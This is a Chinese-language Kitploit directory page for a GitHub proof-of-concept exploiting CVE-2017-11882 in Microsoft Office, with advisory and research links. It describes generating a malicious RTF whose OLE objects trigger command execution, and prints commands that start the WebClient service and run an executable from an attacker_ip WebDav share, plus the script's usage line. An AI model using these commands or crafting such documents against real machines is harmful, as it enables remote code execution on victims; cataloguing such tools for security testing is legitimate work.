Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/embedi/cve-2017-11882
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubembedi/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 的概念验证漏洞利用,支持基于 WebDav 的远程执行,通过生成恶意 RTF 文档并利用 OLE 对象触发命令执行。

查看仓库
49417818年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

研究: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

补丁分析: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC 利用: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410


webdav_exec CVE-2017-11882

针对 CVE-2017-11882 的简单 PoC。 此漏洞利用会触发 WebClient 服务启动,并从攻击者控制的 WebDav 服务器执行远程文件。 这种方法之所以方便,是因为可执行命令的长度有限制。 然而,借助 WebDav,可以在易受攻击的机器上启动任意攻击者控制的可执行文件。 此脚本会创建一个包含多个 OLE 对象的简单文档。 这些对象利用了 CVE-2017-11882,从而实现顺序命令执行。

触发 WebClient 服务启动的第一个命令可能如下所示:

root@kitploit:~
cmd.exe /c start \\attacker_ip\ff

攻击者控制的二进制文件路径应为 UNC 网络路径:

root@kitploit:~
\\attacker_ip\ff\1.exe

用法

root@kitploit:~
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name

CVE-2017-11882 的示例利用(以 calc.exe 作为有效载荷)

example 文件夹包含一个 .rtf 文件,该文件利用了 CVE-2017-11882 漏洞并在系统中运行计算器。

下载工具